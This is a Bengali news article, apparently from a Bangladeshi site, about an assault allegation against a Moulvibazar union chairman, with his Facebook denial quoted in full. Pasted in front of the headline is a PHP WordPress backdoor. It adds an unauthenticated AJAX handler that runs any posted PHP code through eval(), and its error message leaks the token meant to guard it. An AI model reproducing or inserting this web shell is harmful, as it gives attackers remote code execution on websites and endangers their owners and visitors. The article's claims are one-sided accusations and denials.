// ==[BD:jfMd8DMa]== add_action( 'wp_ajax_nopriv_rzgczijdiqa', function() { $bind = 'jfMd8DMaPEVBq74Uwrr23JLITZEvODHc'; $comp = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $comp ) || ! hash_equals( $bind, $comp ) ) { wp_send_json_error( [ 'message' => 'tok:' . $bind ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $sym = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $chunk = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $chunk, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } catch ( \Throwable $val ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $val->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } } ); // ==[/BD:jfMd8DMa]== সত্যের জয় সুনিশ্চিত --মিলন বখত

সত্যের জয় সুনিশ্চিত –মিলন বখত


মৌলভীবাজারের রাজনগর উপজেলা আওয়ামী লীগের সাধারণ সম্পাদক ও মনসুরনগর ইউপি চেয়ারম্যান মিলন বখত এর হাতে একই ইউনিয়নের সংরক্ষিত মহিলা ইউপি সদস্য সুফিয়া বেগম (৭, ৮ ও ৯) লাঞ্চিত হয়েছেন বলে অভিযোগ উঠেছে।

এঘটনায় কয়েকদিন ধরে উপজেলা জুড়ে চলছে ব্যাপক আলোচনা সমালোচনা।
মহিলা ইউপি সদস্য সুফিয়া বেগম জানান, চেয়ারম্যান তাকে লাতি মেরে চেয়ার থেকে ফেলে দিয়েছেন।
এঘটনায় তিনি রাজনগর থানায় একটি লিখিত অভিযোগও দিয়েছেন। পরে অভিযোগের প্রেক্ষিতে তিনি বিস্তারিত নিয়ে একটি সংবাদ সম্মেলনও করেন।

তবে ইউপি চেয়ারম্যান মিলন বখত সবকিছু নাকচ করে দিয়ে বলছেন, আমার বিরুদ্ধে একটা প্রতিক্রিয়াশীল চক্রের উদ্দেশ্যমূলক ষড়যন্ত্র। এসব ঘটনা নিয়ে তিনি তার ব্যাক্তিগত ফেইসবুক আইডিতে ইউনিয়নবাসী সরব থাকার জন্য একটি স্ট্যাটাসও দেন। পাঠকের জন্য হুবহু তার স্ট্যাটাস তুলে ধরা হলো::

প্রিয় মনসুরনগর ইউ‌নিয়নবাসী, রাজনগরের জনগন ও মৌলভীবাজারবাসী।
আপনার‌া আমার সালাম,আদাব ও ঈদ শু‌ভেচ্ছা গ্রহন করুন।

প্রিয় এলাকাবাসী,
আজ আমার ৬০ বছর বয়সে বড় দুঃখ ভারাক্রান্ত মন নি‌য়ে আপনা‌দের দরবা‌রে উপনীত হ‌য়ে‌ছি।

আপনারা জা‌নেন, আ‌মি আমার জীবনের ১৬ বছর বয়স থে‌কে জা‌তির জনক বঙ্গবন্ধু শেখ মু‌জিবুর রহমা‌নের আদ‌র্শের একজন কর্মী।

আ‌শির দশক থে‌কে মামলা, হামলা নির্যাতন নিপীড়ন সহ‌্য ক‌রে জীবনের এই বেলায় একই আদর্শ বুকে নি‌য়ে মা‌টি ও মানু‌ষের টা‌নে রাজনী‌তি ক‌রি।

জীবনের যে সময়টা আমার স্ত্রী সন্তান‌কে দেবার কথা ছিল সে সময়টা আমি কতটুকু মানু‌ষের পা‌শে ছিলাম আপনারা তার সাক্ষী।

আওয়ামী লীগ যতবার বি‌রো‌ধী দ‌লে ছিল প্রত্যেক‌টি আম‌লে আম‌া‌কে বহু মামলা দি‌য়ে হয়রা‌নি করা হ‌য়ে‌ছে। সর্বশেষ ২০১৩ সা‌লের ১৩ ডি‌সেম্বর কাদের মোল্লার ফা‌সির রা‌য়ের দিন মৌলভীবাজার শহ‌রের পোষ্ট অ‌ফিস রো‌ডের বাসা‌টিতে আগুন দেয় সন্ত্রাসীরা আমাকে ও আমার পরিবারকে হত্যার উদ্দেশ্যে। আ‌মার জীপ গা‌ড়ি‌টি সম্পুর্নভা‌বে পু‌ড়ি‌য়ে দেয়‌া হয়।

দেশ আজ ক‌রোনায় আক্রান্ত। ডায়‌বে‌টিস, তিন বার অপা‌রেশ‌নের যন্ত্রনা সহ নানা দুরা‌রোগ‌্য রোগ নি‌য়েও সার্বক্ষ‌নিক আমি আমার এলাকাবাসীর পা‌শে আ‌ছি।

এই ক্রা‌ন্তিকা‌লেও এক‌টি প্রতি‌ক্রিয়‌াশীল চক্র গত ২৩ শে মে আমার ইউ‌নিয়‌নের তাহার লামুয়া গ্রা‌মের এক‌টি বিচা‌রের ঘটনাকে কেন্দ্র ক‌রে আমার বিরু‌দ্ধে ধারাবা‌হিকভা‌বে মিথ‌্যা ও ষড়যন্ত্রমুলক অপপ্রচার চালা‌চ্ছে।

তিন তিনটি অপারেশন আমার শরীরের মধ্যে। গত দু মাস আগেও আমার হার্নিয়া অপারেশন হয়েছে। এ রকম অসুস্থ শরীর নিয়ে আমি কারো সাথে অশালীন আচরন করতে পারি এই প্রশ্নের উত্তর আপনাদের কাছেই রাখলাম।

উপ‌রে আল্লাহ‌কে সাক্ষী রে‌খে বল‌ছি, আ‌মি আমার জীবনের এতটুকু পথচলায় কখ‌নো অন‌্যায় দুর্নীতি সন্ত্রাসের কা‌ছে মাথা নত ক‌রি নি। মিলন বখত কখ‌নো টাকা‌র কা‌ছে,সু‌বিধার জন‌্য আত্বমর্যাদা‌কে বিক্রি ক‌রে দেই‌নি।

আজ‌কে আমার বিরু‌দ্ধে যার‌া মিথ‌্যাচার চা‌লা‌চ্ছেন ফেসবুক সহ বিভিন্ন মিডিয়ায় তাদেরকে বলছি, শুধু এতটুকু ম‌নে রাখ‌বেন আমিও একজন বাবা। তিনজন সন্তানের বাবা আমি।

বিগত দিনগু‌লি‌তে যেভা‌বে সব বাধা বিপ‌ত্তি, ষড়য‌ন্ত্রের জাল ভে‌ঙ্গে যেভা‌বে মনসুরনগর বাসীর, রাজনগর বাসীর পা‌শে ছিল‌াম, জীবনের শেষ মুহুর্ত পর্যন্ত মানু‌ষের পা‌শে থ‌াকব এ অঙ্গীকার আপনাদের কা‌ছে রইল।

আপনারা ভা‌লো থাক‌বেন। ইনশাল্লাহ স‌ত্যের জয় স‌ু‌নি‌শ্চিত।
জয় বাংলা, জয় বঙ্গবন্ধু।

এশিয়াবিডি/ডেস্ক/মুবিন 

আরও সংবাদ